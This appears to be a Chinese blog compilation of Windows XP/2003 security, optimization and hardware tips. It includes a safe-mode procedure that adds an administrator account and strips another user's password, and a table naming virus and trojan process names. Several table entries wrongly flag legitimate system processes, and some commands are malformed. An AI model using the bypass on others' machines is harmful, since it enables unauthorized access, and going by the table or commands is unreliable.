Windows安装后,会创建一些隐藏共享,不是很安全。我们可以通过下面的方法来切断共享:按下Win+R,输入gpedit.msc,在打开窗口中逐步展开“用户配置→Windows设置→脚本(登录/注销)”文件夹,在对应“脚本(登录/注销)”文件夹右边的子窗口中,双击“登录”选项,在弹出的窗口中,单击“添加”命令,将事先设置好的删除默认共享的批处理文件选中,例如这里的脚本文件为C盘中的“delshare.bat”,如图1所示,最后单击“确定”按钮,就能删除Windows默认共享。注意,C盘中的“delshare.bat”必须自己事先创建,其中的代码为:
@echo off
net share C$/del
net share d$/del
netshare ipc$/del
net share admin$ /del

完成上述设置后,重新启动系统,就能自动切断Windows 2003的默认共享通道了,如果你有更多硬盘,请在net share d$/del下自行添加,如net share e$/del、net share f$/del等。

2.不要急着接入网络

在安装完成Windows后,不要立即把服务器接入网络,因为这时的服务器还没有打上各种补丁,存在各种漏洞,非常容易感染病毒和被入侵。此时要加上冲击波和震撼波补丁后并重新启动再联入互联网。

小提示:补丁的安装应该在所有应用程序安装完之后,因为补丁程序往往要替换或修改某些系统文件,如果先安装补丁再安装应用程序有可能导致补丁不能起到应有的效果。如IIS的HotFix要求每次更改IIS的配置时都需要重新安装。

3.禁止建立空连接

默认情况下,任何用户可通过空连接连上服务器,枚举账号并猜测密码。可以通过以下两种方法禁止建立空连接。

(1)修改[Local_Machine\System\CurrentControlSet\Control\LSA]的键RestrictAnonymous的值改成1,如图2所示。

(2)修改Windows 2000的本地安全策略,设置“本地安全策略→本地策略→选项”中的RestrictAnonymous(匿名连接的额外限制)为“不容许枚举SAM账号和共享”。

4.可考虑打上SP2

最新的补丁是Windows XP Service Pack 2 简体中文版,但也不是所有的人都需要打上这个补丁。

5.切断自动保存通道

Windows系统一旦在访问程序出错时,系统中的Dr.Watson程序会将出错时的一些个人隐私信息自动保存下来,这些隐私信息往往是黑客最喜欢“盯梢”的;为了避免泄露隐私信息,应该切断Dr.Watson程序的自动保存功能:

打开“注册表编辑器”,展开[HKEY_local_machine\software\Microsof\WindowsNT\CurrentVersion\AeDebug]键,在对应AeDebug子键的右边,双击Auto值,将“数值数据”设为“0”。然后进入系统的“DrWatson文件夹”中(位于),如图3所示,将其中的User.dmp、Drwtsn32.log删除掉就可以了。

6.防止文件名欺骗

设置以下选项可防止文件名欺骗,如防止以.txt或.exe为后缀的恶意文件被显示为.txt文件,从而使人大意打开该文件: 双击“我的电脑→工具→文件夹选项→查看”,选择“显示所有文件和文件夹”属性设置,去掉“隐藏已知文件类型扩展名”属性设置。

二、驱动程序备份与硬件优化

打完补丁和做好各种安全防范后,下面要开始做的工作就是安装各种驱动程序了。打上主板驱动,确认无误,将驱动程序备份下来,备用。

1.设定CPU 的 L2 Cache,加快整体效能

打开“注册表编辑器”,展开[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/SessionManager/MemoryManagement],在右边窗口将SecondLevelDataCache改为CPU L2 Cache一样的十进制数值(例如P4 1.6G 的 L2 Cache 为 256Kb,则改为十进制数值 256),如图4所示。

2.启用DMA传输模式

启用DMA模式之后,计算机周边设备(主要指硬盘)即可直接与内存交换数据,这样能加快硬盘读写速度,提高数据传输速率,方法是:
选择“控制面板→系统/硬件,打开“设备管理器”,其中“IDE控制器”有两项Primary IDE Channel及Secondary IDE Channel,依次进入“属性→高级设置”,该对话框会列出目前IDE接口所连接设备的传输模式,单击列表按钮将“传输模式”设置为“DMA(若可用)”,如图5所示。

3.设置虚拟内存

除了CPU及硬盘,内存也可以影响XP的运行性能,因此,设定好虚拟内存也可以提高XP的运行速度。设置方法:

进入“控制面板→系统/高级/性能/设置,在“性能选项”的“高级”设置窗口,首先将“处理器计划”及“内存使用”都调整为“程序”,这样系统会给前台程序更多资源、使之运行更快。单击“更改”按钮进入虚拟内存设置窗口,将虚拟内存值设为物理内存的2.5倍,将初始大小和最大值值设为一样。

若你的内存大于256M,建议禁用分页文件;如果内存低于256M,请勿禁用分页文件,否则会导致系统崩溃或无法再启动XP!

三、系统性能优化

只要我们按照下面的步骤优化XP,把系统调整到最佳状态,就可以大幅度提高系统运行的速度。

1.关闭错误报告

单击“开始→设置→控制面板”,打开“控制面板”,双击“系统”,单击“高级”标签,然后单击“错误报告”按钮,选择“禁用错误报告”,并且取消下面的“但在发生严重错误时通知我”的勾选,依次单击“确定”按钮退出即可,如图6所示!

2.减轻启动时加载的任务

许多软件在XP启动时都会自动加载,使系统的启动时间延长,应该取消软件的自动加载。选择“开始”选单的“运行”,键入“msconfig”启动“系统配置实用程序”,进入“启动”标签,其中列出了系统启动时加载的项目及来源,如果不希望它自动加载,清除项目前的复选框即可。

3.修改注册表来减少预读取,减少进度条等待时间

打开“注册表编辑器”,展开注册表[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters],有一个键EnablePrefetcher把它的数值改为“1”就可以了。另外不常更换硬件的朋友可以在系统属性中把总线设备上面的设备类型设置为none(无)。

4.取消Windows XP的ZIP支持

单击开始→运行,输入“regsvr32 /u zipfldr.dll”回车,如图7所示,出现提示窗口“zipfldr.dll中的Dll UnrgisterServer成功”即可取消Windows XP的ZIP文件夹支持。

5.快速浏览局域网络的共享

通常情况下,Windows XP在连接其它计算机时,会全面检查对方机子上所有预定的任务,这个检查会让你等上30秒钟或更多时间。去掉的方法是删除注册表[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Explorer\RemoteComputer\NameSpace]键值下的键,重启计算机后Windows XP就不再检查预定任务了。

6.关掉多余的服务

单击“开始→设置/控制面板,双击“管理工具→服务,右击要配置的服务,单击“属性”,在“常规”选项卡上选择“自动”、“手动”或“禁用”。实际配置时,选择“手动”或者“禁用”都可以关闭该服务,推荐使用手动功能,以便可随时启动一些临时需要的服务。

7. 减少多重启动时的等待时间

当Windows XP与其它Windows共存时,每次启动都会显示启动菜单,关闭启动菜单的方法是:单击“控制面板→系统→属性→高级”单击“启动和故障恢复”下面的“设置”按钮,进入“设置”窗口,选择启动时的默认操作系统为Windows XP,显示启动菜单的时间为0;如图8所示,如果暂时不用或隐藏另一个操作系统,则取消“显示操作系统列表时间”前的勾选。

8.Windows XP实现自动关机

如果XP不能自动关机,则单击“控制面板→电源选项→高级电源管理”,给“启用高级电源管理”打钩,如果还不行,那应该是主板BIOS的问题了。

9.优化XP的界面

XP安装后任务栏、开始菜单、桌面背景、窗口、按钮等都采用了XP的豪华风格,非常浪费系统资源,建议恢复Windows经典的界面:右键桌面空白处,在弹出选单单击“属性”进入显示属性设置窗口,将“主题、外观”都设置为“Windows经典”,将桌面背景设置为“无”,按确定保存退出。右击任务栏,选择“属性”,“任务栏”标签中去掉“分组相似任务栏按钮”前的勾;“开始菜单”标签中选择“经典开始菜单”。

10.关闭远程桌面

单击“我的电脑→属性/远程,在“远程桌面”下,将“允许用户远程连接到这台计算机”勾去掉。

11.关闭系统还原

默认情况下,XP启用了系统还原功能,每个驱动器约被占用高达4%~12%的硬盘空间,并且系统还原的监视系统还会自动创建还原点,在后台运行就会占用较多的系统资源,应该关闭之:右击“我的电脑”中的“属性”,单击“系统属性→系统还原,将“在所有驱动器上关闭系统还原”置为选中状态。也可关闭不重要分区的系统还原,如果考虑系统安全,则不要关闭还原功能。

12.少用视觉效果

单击“控制面板→系统,选择“系统属性”中的“高级”标签进入“性能选项”界面,其中有很多的“视觉效果”,选中的效果越多,占用的系统资源就越多,因此我们选定“调整为最佳性能”项,如图9所示,以便关闭淡入淡出、平滑滚动、滑动打开等所有视觉效果。

13.关闭系统属性中的特效

这可是简单有效的提速良方。单击“开始→控制面板→系统→高级→性能→设置”,在视觉效果中,设置为调整为最佳性能→确定即可。这样桌面就会和Windows 2000很相似的,我还是挺喜欢XP的蓝色窗口,所以在“在窗口和按钮上使用视觉样式”打上勾,这样既能看到漂亮的蓝色界面,又可以加快速度。

14.加快菜单显示速度

单击“开始→运行,键入Regedit,进入[HKEY_CURRENT_USER\Control Panel\Desktop],将MenuShowDelay的值改为0(如觉得不适应可改为200),重新开机便生效。修改后XP的开始选单、甚至应用软件的选单显示速度都会明显加快。

15.加快XP关闭程序的速度

单击“开始→运行,键入Regedit,将 HKEY_CURRENT_USER\Control Panel\Desktop\WaitToKillAppTimeout 改为 1000,即关闭程序时仅等待1秒;将键值 HungAppTimeout改为200,表示程序出错时等待0.5秒;将HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WaitToKillServiceTimeout 设为1000或更小。

让系统自动关闭停止回应的程序,方法:将HKEY_CURRENT_USER\Control Panel\Desktop\ AutoEndTasks 值设为 1,重启电脑后即可生效。

16.关闭XP内设的刻盘功能

默认情况下,XP开启了内设的刻盘功能,该功能可以加快Nero 刻录软件的处理速度,如果不用此功能可以关闭之:单击“控制面板→管理工具→服务”,双击“IMAPI CD-Burning COM Service”,如图10所示,将“启动类型”改为“手动”或“已禁用”。

17.改变图片浏览缩略图的大小与图像品质

Windows XP基层了Windows 2000的图片浏览缩略图功能,为我们查看文件夹中的图片提供了方便。我们可以通过修改注册表中相关的项来改变缩略图的大小,从而在一个页面中显示更多缩略图。方法如下:在“开始→运行”中键入Regedit,打开“注册表编辑器”,展开分支[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer],在右侧窗口中新建一个名为“ThumbnailSize”的DWORD值,它的值可以从32到256(十进制),建议选择50(默认值为100),这样就可以减小缩略图,使得在同一页面中可以显示更多的缩略图。退出“注册表编辑器”后我们马上可以看到效果。在对预览效果要求不高的情况下,此举可以大大方便我们的查找工作。

采用缩略图方式查看文件不可避免地要占用磁盘空间和内存,我们可以通过改变缩略图的图像品质来缓解磁盘和内存的压力。同样是在该注册表分支的右侧窗口中添加一个名为ThumbnailQuality的DWORD值,数值设为50到100(十进制)之间,建议设为50。另外,如果在“我的电脑”中单击“查看→缩略图”,并同时按住Shift键。这样出现的缩略图下方就不会显示文件名了。若要再次显示文件名,只须先选择其他查看方法,然后再选择“缩略图”方式即可。

18.可考虑彻底禁用Windows XP的缩略图功能

内存不富裕的用户来说,缩略图功能有点雪上加霜,可以禁用缩略图功能!打开“注册表编辑器”,展开分支[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced],在右侧窗口中找到“ClassicViewState”项,将它的值改为1,如图11所示。然后打开“资源管理器”,单击“工具→文件夹选项”,进入“查看”选项卡,在“高级设置”栏中选择“不缓存缩略图”项即可。

四、安装必备软件

这时候,我们应该开始必备软件了,比如WinRAR、WinZIP、邮件收发软件……

五、减肥瘦身,为系统克隆做准备

1.删除新设备文件

若确认系统不会再加入新设备,则可以把目录内的文件予以删除或设定大小,以释放空间。

2.卸载不常用组件

用记事本修改<%windir%\inf\sysoc.inf>,用“查找/替换”功能,在查找框中输入“,hide”,全部替换为空。这样,就把所有的“,hide”都去掉了,存盘退出后再运行“添加/删除程序”,就会看见“添加/删除 Windows 组件”中多出不少选项,删除掉游戏等不用的东西。

3.删除不用的文件

驱动程序备份Driver.cab:在<%windir%\Driver cache\i386>下,约70MB,可以删除掉;
帮助文件:在<%windir%\Help>下,约40MB,可删除;
不用的输入法:到<%windir%\ime>下删除不要的输入法,如chtime、imjp8_1、imkr6_1(分别是繁体中文、日文、韩文)目录,如图12所示。

4.重定向系统相关文件夹

把临时文件放到启动盘外、移动“我的文档”文件夹、将IE临时文件夹移到其他分区。

六、备份整个系统

1.Ghost备份系统分区

费了这么长时间优化清理系统,要是不把成果保存起来,岂不亏死了?Ghost是不二的选择。

2.备份分区表和引导区数据

在KV等杀毒软件里,都附带了创建紧急恢复盘的功能,其实是备份分区表和引导区数据,记住一定要备份一个分区表,尤其是使用Ghost的用户。

 

xp密码破解方法之一

密码破解(适用初级学习者)
>如用戶忘記登入密碼可按下列方法解決 >1. 在電腦啟動時按〔F8〕及選〔Safe Mode With Command Prompt〕 >2. 選 〔Administrator〕後便會跳出〔Command Prompt〕的窗口 >3. 用〔Net〕的命令增加一個用戶,例:增加一個用戶名為 alanhkg888,命令語法如下 >net user alanhkg888 /add >4. 將新增用戶提升至 Administrator 的權力,例:提升剛才增加用戶 alanhkg888 的權力,命令語法如下 >net localgroup administrators alanhkg888 /add >5. 完成上列步驟後重新啟動電腦,在啟動畫面上便增加了一個用戶 alanhkg888 了,選 alanhkg888 進入 >6. 登入後在〔控制台〕→〔使用者帳戶〕→選忘記密碼的用戶,然後選〔移除密碼〕後〔等出〕 >7. 在登入畫面中選原來的用戶便可不需密碼情況下等入 (因已移除了) >8. 刪除剛才新增的用戶,在〔控制台〕→〔使用者帳戶〕→選〔alanhkg888〕,然後選〔移除帳戶〕便可 >*不適用於忘記安裝時所設定〔administrator〕的密碼  

Explorer.exe程序在系统中的作用

     凡是Windows系列的操作系统,运行时都会启动一个名为Explorer.exe的进程。这个进程主要负责显示系统桌面上的图标以及任务栏,它在不同的系统中有不同的妙用。

  Windows 9x中的应用

  在Windows 9x中,这个进程是运行系统时所必需的。如果用“结束任务”的方法来结束Explorer.exe进程,系统就会刷新桌面,并更新注册表。所以,我们也可以利用此方法来快速更新注册表。方法如下:

  按下Ctrl+Alt+Del组合键,出现“结束任务”对话框。在该对话框中选择“Explorer”选项,然后单击“结束任务”按钮,将出现“关闭Windows”对话框。单击“否”按钮,系统过一会儿将出现另一个对话框,告诉你该程序没有响应,询问是否结束任务。单击“结束任务”按钮,则更新注册表并返回Windows 9x系统环境中。这比起烦琐的重新启动过程要方便多了?

  Windows 2000/XP中的应用

    在Windows 2000/XP和其他Windows NT内核的系统中,Explorer.exe进程并不是系统运行时所必需的,所以可以用任务管理器来结束它,并不影响系统的正常工作。打开你需要运行的程序,如记事本。然后右击任务栏,选择“任务管理器”,选中“进程”选项卡,在窗口中选择Explorer.exe进程,单击“结束进程”按钮,,接下来桌面上除了壁纸(活动桌面Active Desktop的壁纸除外),所有图标和任务栏都消失了。此时你仍可以像平常一样操作一切软件。

    如果你想运行其他软件,但此时桌面上空无一物,怎么办?别着急,下面有两种可以巧妙地打开其他软件:

  第一种方法:按下Ctrl+Alt+Del组合键,出现“Windows安全”对话框,单击“任务管理器”按钮(或是直接按下Ctrl+Shift+Esc组合键),在任务管理器窗口中选中“应用程序”选项卡,单击“新任务”,在弹出的“创建新任务”的对话框中,输入你想要打开的软件的路径和名称即可。

  你还可以在正在运行的软件上,选择“文件→打开”,在“打开”对话框中,点击“文件类型”下拉列表,选择“所有文件”,再浏览到你想打开的软件,右击它,在快捷菜单中选择“打开”命令,就可以启动你需要的软件了。注意,此时不能够通过单击“打开”按钮来打开软件,此种方法适用于大多数软件,Office系列除外。
通过结束Explorer.exe进程,还可以减少4520KB左右的系统已使用内存,无疑会加快系统的运行速度,为资源紧张的用户腾出了宝贵的空间。

  提示:重新启动Explorer.exe进程后,有些软件在任务栏系统托盘的小图标会消息,但该软件还是在正常运行当中。如果觉得有些不方便,可以再次打开该软件来显示小图标。 
 

计算机基础知识

CPU的实际工作频率是外频和倍频的乘积,外频好比马路的宽度,倍频好比在这条马路上单位时间允许通过的车辆数。目前主流CPU的外频通常为66、100或133,比如PentiumIII 667就是133外频乘以5倍频。一般来说,外频高的CPU性能要好一些,这就是为什么使用133外频的PIII667会与使用100外频的PIII700不相上下的原因。所以在选择CPU的时候除了要看总频率,还要注意频率的构成。 
CPU的频率 
凡是懂得点电脑的朋友,都应该对‘频率’两个字熟悉透了吧!作为机器的核心CPU的频率当然是非常重 
要的,因为它能直接影响机器的性能。那么,您是否对CPU频率方面的问题了解得很透彻呢?请随我来,让我给您详细说说吧! 

所谓主频,也就是CPU正常工作时的时钟频率,从理论上讲CPU的主频越高,它的速度也就越快,因为频率 
越高,单位时钟周期内完成的指令就越多,从而速度也就越快了。但是由于各种CPU内部结构的差异 (如缓存、指令集),并不是时钟频率相同速度就相同,比如PIII和赛扬,雷鸟和DURON,赛扬和DURON,PIII与雷鸟,在相同主频下性能都不同程度的存在着差异。目前主流CPU的主频都在600MHz以上,而频率 最高(注意,并非最快)的P4已经达到1.7GHz,AMD的雷鸟也已经达到了1.3GHz,而且还会不断提升。 

在486出现以后,由于CPU工作频率不断提高,而PC机的一些其他设备(如插卡、硬盘等)却受到工 艺的限制,不能承受更高的频率,因此限制了CPU频率的进一步提高。因此,出现了倍频技术,该技术能 够使CPU内部工作频率变为外部频率的倍数,从而通过提升倍频而达到提升主频的目的。因此在486以后我们接触到两个新的概念--外频与倍频。它们与主频之间的关系是外频X倍频=主频。一颗CPU的外频与今天我们常说的FSB(Front side bus,前端总线)频率是相同的(注意,是频率相同),目前市场上的CPU的外频主要有66MHz(赛扬系列)、100MHz(部分PIII和部分雷鸟以及所有P4和DURON)、133MHz(部 分PIII和部分雷鸟)。值得一提的是,目前有些媒体宣传一些CPU的外频达到了200MHz(DURON)、266MHz(雷鸟)甚至400MHz(P4),实际上是把外频与前端总线混为一谈了,其实它们的外频仍然是100MHz和133MHz,但是由于采用了特殊的技术,使前端总线能够在一个时钟周期内完成2次甚至4次传输,因此相当于将前端总线频率提升了好几倍。不过从外频与倍频的定义来看,它们的外频并未因此而发生改变,希望大家注意这一点。今天外频并未比当初提升多少,但是倍频技术今天已经发展到一个很高的阶段 。以往的倍频都只能达到2-3倍,而现在的P4、雷鸟都已经达到了10倍以上,真不知道以后还会不会更高。眼下的CPU倍频一般都已经在出厂前被锁定(除了部分工程样品),而外频则未上锁。部分CPU如AMD的,DURON和雷鸟能够通过特殊手段对其倍频进行解锁,而INTEL产CPU则不行。 

由于外频不断提高,渐渐地提高到其他设备无法承受了,因此出现了分频技术(其实这是主板北桥芯 
片的功能)。分频技术就是通过主板的北桥芯片将CPU外频降低,然后再提供给各插卡、硬盘等设备。早 
期的66MHz外频时代是PCI设备2分频,AGP设备不分频;后来的100MHz外频时代则是PCI设备3分频,AGP设 
备2/3分频(有些100MHz的北桥芯片也支持PCI设备4分频);目前的北桥芯片一般都支持133MHz外频,即 
PCI设备4分频、AGP设备2分频。总之,在标准外频(66MHz、100MHz、133MHz)下北桥芯片必须使PCI设备 
工作在33MHz,AGP设备工作在66MHz,才能说该芯片能正式支持该种外频。 

最后再来谈谈CPU的超频。CPU超频其实就是通过提高外频或者倍频的手段来提高CPU主频从而提升整 
个系统的性能。超频的历史已经很久远(其实也就几年),但是真正为大家所喜爱则是从赛扬系列的出产 
而开始的,其中赛扬300A超450、366超550直到今天还为人们所津津乐道。而它们就是通过将赛扬CPU的 
66MHz外频提升到100MHz从而提升了CPU的主频。而早期的DURON超频则与赛扬不同,它是通过破解倍频锁 
然后提升倍频的方式来提高频率。总的看来,超倍频比超外频更稳定,因为超倍频没有改变外频,也就 
不会影响到其他设备的正常运作;但是如果超外频,就可能遇到非标准外频如75MHz、83MHz、112MHz等, 
这些情况下由于分频技术的限制,致使其他设备都不能工作在正常的频率下,从而可能造成系统的不稳定 
,甚至出现硬盘数据丢失、严重的可能损坏。因此,笔者在这里告诫大家:超频虽有好处,但是也十分危 
险,所以请大家慎重超频!
内存就是随机存贮器(Random Access Memory,简称为RAM)。RAM分成两大类:静态随机存储器,即Static RAM(SRAM)和动态随机存储器,Dynamic RAM(DRAM),我们经常说的“系统内存”就是指后者,DRAM。
  
  SRAM是一种重要的内存,它的用途广泛,被应用在各个领域。SRAM的速度非常快,在快速读取和刷新时可以保持数据完整性,即保持数据不丢失。SRAM内部采用的是双稳态电路的形式来存储数据,为了实现这种结构,SRAM的电路结构非常复杂,往往要采用大量的晶体管来构造寄存器以保留数据。采用大量的晶体管就需要大量的硅,因此就增加了芯片的面积,无形中增加了制造成本。制造相同容量的SRAM比DRAM的成本贵许多,因此,SRAM在PC平台上就只能用于CPU内部的一级缓存以及内置的二级缓存。而我们所说的“系统内存”使用的应该是DRAM。由于SRAM的成本昂贵,其发展受到了严重的限制,目前仅有少量的网络服务器以及路由器上使用了SRAM。
  
  DRAM的应用比SRAM要广泛多了。DRAM的结构较SRAM要简单许多,它的内部仅仅由一个MOS管和一个电容组成,因此,无论是集成度、生产成本以及体积,DRAM都比SRAM具有优势。目前,随着PC机的不断发展,我们对于系统内存的要求越来越大,随着WindowXP的推出,软件对于内存的依赖更加明显:在WindowsXP中,专业版至少需要180MB内存以上,而在实际使用中,128MB才能保证系统正常运行。因此,随着PC的发展,内存的容量将不断扩大,速度也会不断提升。
  
  好了,下面我们在来说一下内存的速度问题。我们选择内存的速度,决定于你选用CPU的前端总线,例如你用的是Pentium 4A那你用双通道的DDR200或者DDR400就已经足够了~因为P4A的前端总线是400MHz,但是由于内存厂商的市场策略问题,DDR200基本就没有出货。取而代之的是DDR266能够提供2.1GB的带宽,此种内存适用于Athlon XP低频、毒龙以及533MHz FSB Pentium 4B等半过时产品(需搭配双通道),已经不在主流市场之内。
  
  DDR333能够提供2.7GB的内存带宽适用于AMD 166MHz外频的Barton处理器。而双通道的DDR400内存以及DDR433 DDR450内存将能够提供6.4GB以上的内存带宽,主要应用在Intel高端的Pentium 4C、Pentium 4E(Prescott核心)以及Athlon 64上面。当然,上文所述的仅仅是能够满足硬件系统的最低要求,如果您拥有一颗像毒龙1.6GHz、Athlon XP 1800+(b0 1.5V低压版)、Pentium 4 1.8A、AthlonXP 2000+Pentium 4 2.4C以及Barton 2500+这样具有极品超频潜力的CPU那么我推荐您购买高档次的内存,例如Athlon 2000+配合DDR333的内存,这样基本所有的Barton 2000+都可以超到2500+使用,市场上的假2500+就是用2000+超频而来的。
  
  在Windows XP系统的实际应用中,我们提出一个不规范的公式 内存容量〉内存速度〉内存类型。也就是说就算是256M的SDRAM也要比128M的DDR400系统速度快,在选购内存的时候,我们建议XP系统应该配备384M以上的内存,才能保证系统的快速运行。 
文章来自于【学吧】http://www.xue8.com/article/ViewArticle.asp?ArticleID=673  


CPU缓存(Cache Memory)是位于CPU与内存之间的临时存储器,它的容量比内存小的多但是交换速度却比内存要快得多。缓存的出现主要是为了解决CPU运算速度与内存读写速度不匹配的矛盾,因为CPU运算速度要比内存读写速度快很多,这样会使CPU花费很长时间等待数据到来或把数据写入内存。在缓存中的数据是内存中的一小部分,但这一小部分是短时间内CPU即将访问的,当CPU调用大量数据时,就可避开内存直接从缓存中调用,从而加快读取速度。由此可见,在CPU中加入缓存是一种高效的解决方案,这样整个内存储器(缓存+内存)就变成了既有缓存的高速度,又有内存的大容量的存储系统了。缓存对CPU的性能影响很大,主要是因为CPU的数据交换顺序和CPU与缓存间的带宽引起的。 

缓存的工作原理是当CPU要读取一个数据时,首先从缓存中查找,如果找到就立即读取并送给CPU处理;如果没有找到,就用相对慢的速度从内存中读取并送给CPU处理,同时把这个数据所在的数据块调入缓存中,可以使得以后对整块数据的读取都从缓存中进行,不必再调用内存。 

正是这样的读取机制使CPU读取缓存的命中率非常高(大多数CPU可达90%左右),也就是说CPU下一次要读取的数据90%都在缓存中,只有大约10%需要从内存读取。这大大节省了CPU直接读取内存的时间,也使CPU读取数据时基本无需等待。总的来说,CPU读取数据的顺序是先缓存后内存。 

目前缓存基本上都是采用SRAM存储器,SRAM是英文Static RAM的缩写,它是一种具有静志存取功能的存储器,不需要刷新电路即能保存它内部存储的数据。不像DRAM内存那样需要刷新电路,每隔一段时间,固定要对DRAM刷新充电一次,否则内部的数据即会消失,因此SRAM具有较高的性能,但是SRAM也有它的缺点,即它的集成度较低,相同容量的DRAM内存可以设计为较小的体积,但是SRAM却需要很大的体积,这也是目前不能将缓存容量做得太大的重要原因。它的特点归纳如下:优点是节能、速度快、不必配合内存刷新电路、可提高整体的工作效率,缺点是集成度低、相同的容量体积较大、而且价格较高,只能少量用于关键性系统以提高效率。 

按照数据读取顺序和与CPU结合的紧密程度,CPU缓存可以分为一级缓存,二级缓存,部分高端CPU还具有三级缓存,每一级缓存中所储存的全部数据都是下一级缓存的一部分,这三种缓存的技术难度和制造成本是相对递减的,所以其容量也是相对递增的。当CPU要读取一个数据时,首先从一级缓存中查找,如果没有找到再从二级缓存中查找,如果还是没有就从三级缓存或内存中查找。一般来说,每级缓存的命中率大概都在80%左右,也就是说全部数据量的80%都可以在一级缓存中找到,只剩下20%的总数据量才需要从二级缓存、三级缓存或内存中读取,由此可见一级缓存是整个CPU缓存架构中最为重要的部分。 

一级缓存(Level 1 Cache)简称L1 Cache,位于CPU内核的旁边,是与CPU结合最为紧密的CPU缓存,也是历史上最早出现的CPU缓存。由于一级缓存的技术难度和制造成本最高,提高容量所带来的技术难度增加和成本增加非常大,所带来的性能提升却不明显,性价比很低,而且现有的一级缓存的命中率已经很高,所以一级缓存是所有缓存中容量最小的,比二级缓存要小得多。 

一般来说,一级缓存可以分为一级数据缓存(Data Cache,D-Cache)和一级指令缓存(Instruction Cache,I-Cache)。二者分别用来存放数据以及对执行这些数据的指令进行即时解码,而且两者可以同时被CPU访问,减少了争用Cache所造成的冲突,提高了处理器效能。目前大多数CPU的一级数据缓存和一级指令缓存具有相同的容量,例如AMD的Athlon XP就具有64KB的一级数据缓存和64KB的一级指令缓存,其一级缓存就以64KB+64KB来表示,其余的CPU的一级缓存表示方法以此类推。 

Intel的采用NetBurst架构的CPU(最典型的就是Pentium 4)的一级缓存有点特殊,使用了新增加的一种一级追踪缓存(Execution Trace Cache,T-Cache或ETC)来替代一级指令缓存,容量为12KμOps,表示能存储12K条即12000条解码后的微指令。一级追踪缓存与一级指令缓存的运行机制是不相同的,一级指令缓存只是对指令作即时的解码而并不会储存这些指令,而一级追踪缓存同样会将一些指令作解码,这些指令称为微指令(micro-ops),而这些微指令能储存在一级追踪缓存之内,无需每一次都作出解码的程序,因此一级追踪缓存能有效地增加在高工作频率下对指令的解码能力,而μOps就是micro-ops,也就是微型操作的意思。它以很高的速度将μops提供给处理器核心。Intel NetBurst微型架构使用执行跟踪缓存,将解码器从执行循环中分离出来。这个跟踪缓存以很高的带宽将uops提供给核心,从本质上适于充分利用软件中的指令级并行机制。Intel并没有公布一级追踪缓存的实际容量,只知道一级追踪缓存能储存12000条微指令(micro-ops)。所以,我们不能简单地用微指令的数目来比较指令缓存的大小。实际上,单核心的NetBurst架构CPU使用8Kμops的缓存已经基本上够用了,多出的4kμops可以大大提高缓存命中率。而如果要使用超线程技术的话,12KμOps就会有些不够用,这就是为什么有时候Intel处理器在使用超线程技术时会导致性能下降的重要原因。 

例如Northwood核心的一级缓存为8KB+12KμOps,就表示其一级数据缓存为8KB,一级追踪缓存为12KμOps;而Prescott核心的一级缓存为16KB+12KμOps,就表示其一级数据缓存为16KB,一级追踪缓存为12KμOps。在这里12KμOps绝对不等于12KB,单位都不同,一个是μOps,一个是Byte(字节),而且二者的运行机制完全不同。所以那些把Intel的CPU一级缓存简单相加,例如把Northwood核心说成是20KB一级缓存,把Prescott核心说成是28KB一级缓存,并且据此认为Intel处理器的一级缓存容量远远低于AMD处理器128KB的一级缓存容量的看法是完全错误的,二者不具有可比性。在架构有一定区别的CPU对比中,很多缓存已经难以找到对应的东西,即使类似名称的缓存在设计思路和功能定义上也有区别了,此时不能用简单的算术加法来进行对比;而在架构极为近似的CPU对比中,分别对比各种功能缓存大小才有一定的意义。  

常见病毒、木马进程速查表

      常见病毒、木马进程速查表
本文含概了windows几乎所有常见的病毒、木马的进程名程,检查你的系统进程,看看是否中招。 

exe → BF Evolution Mbbmanager.exe → 聪明基因 

_.exe → Tryit Mdm.exe → Doly 1.6-1.7 

Aboutagirl.exe → 初恋情人 Microsoft.exe → 传奇密码使者 

Absr.exe → Backdoor.Autoupder Mmc.exe → 尼姆达病毒 

Aplica32.exe → 将死者病毒 Mprdll.exe → Bla 

Avconsol.exe → 将死者病毒 Msabel32.exe → Cain and Abel 

Avp.exe → 将死者病毒 Msblast.exe → 冲击波病毒 

Avp32.exe → 将死者病毒 Mschv.exe → Control 

Avpcc.exe → 将死者病毒 Msgsrv36.exe → Coma 

Avpm.exe → 将死者病毒 Msgsvc.exe → 火凤凰 

Avserve.exe → 震荡波病毒 Msgsvr16.exe → Acid Shiver 

Bbeagle.exe → 恶鹰蠕虫病毒 Msie5.exe → Canasson 

Brainspy.exe → BrainSpy vBeta Msstart.exe → Backdoor.livup 

Cfiadmin.exe → 将死者病毒 Mstesk.exe → Doly 1.1-1.5 

Cfiaudit.exe → 将死者病毒 Netip.exe → Spirit 2000 Beta 

Cfinet32.exe → 将死者病毒 Netspy.exe → 网络精灵 

Checkdll.exe → 网络公牛 Notpa.exe → Backdoor 

Cmctl32.exe → Back Construction Odbc.exe → Telecommando 

Command.exe → AOL Trojan Pcfwallicon.exe → 将死者病毒 

Diagcfg.exe → 广外女生 Pcx.exe → Xplorer 

Dkbdll.exe → Der Spaeher Pw32.exe → 将死者病毒 

Dllclient.exe → Bobo Recycle - Bin.exe → s**tHeap 

Dvldr32.exe → 口令病毒 Regscan.exe → 波特后门变种 

Esafe.exe → 将死者病毒 Tftp.exe → 尼姆达病毒 

Expiorer.exe → Acid Battery Thing.exe → Thing 

Feweb.exe → 将死者病毒 User.exe → Schwindler 

Flcss.exe → Funlove病毒 Vp32.exe → 将死者病毒 

Frw.exe → 将死者病毒 Vpcc.exe → 将死者病毒 

Icload95.exe → 将死者病毒 Vpm.exe → 将死者病毒 

Icloadnt.exe → 将死者病毒 Vsecomr.exe → 将死者病毒 

Icmon.exe → 将死者病毒 Server.exe → Revenger, WinCrash, YAT 

Icsupp95.exe → 将死者病毒 Service.exe → Trinoo 

Iexplore.exe → 恶邮差病毒 Setup.exe → 密码病毒或Xanadu 

Rpcsrv.exe → 恶邮差病毒 Sockets.exe → Vampire 

Rundll.exe → SCKISS爱情森林 Something.exe → BladeRunner 

Rundll32.exe→ 狩猎者病毒 Spfw.exe → 瑞波变种PX 

Runouce.exe → 中国黑客病毒 Svchost.exe (线程105) → 蓝色代码 

Scanrew.exe → 传奇终结者 Sysedit32.exe → SCKISS爱情森林 

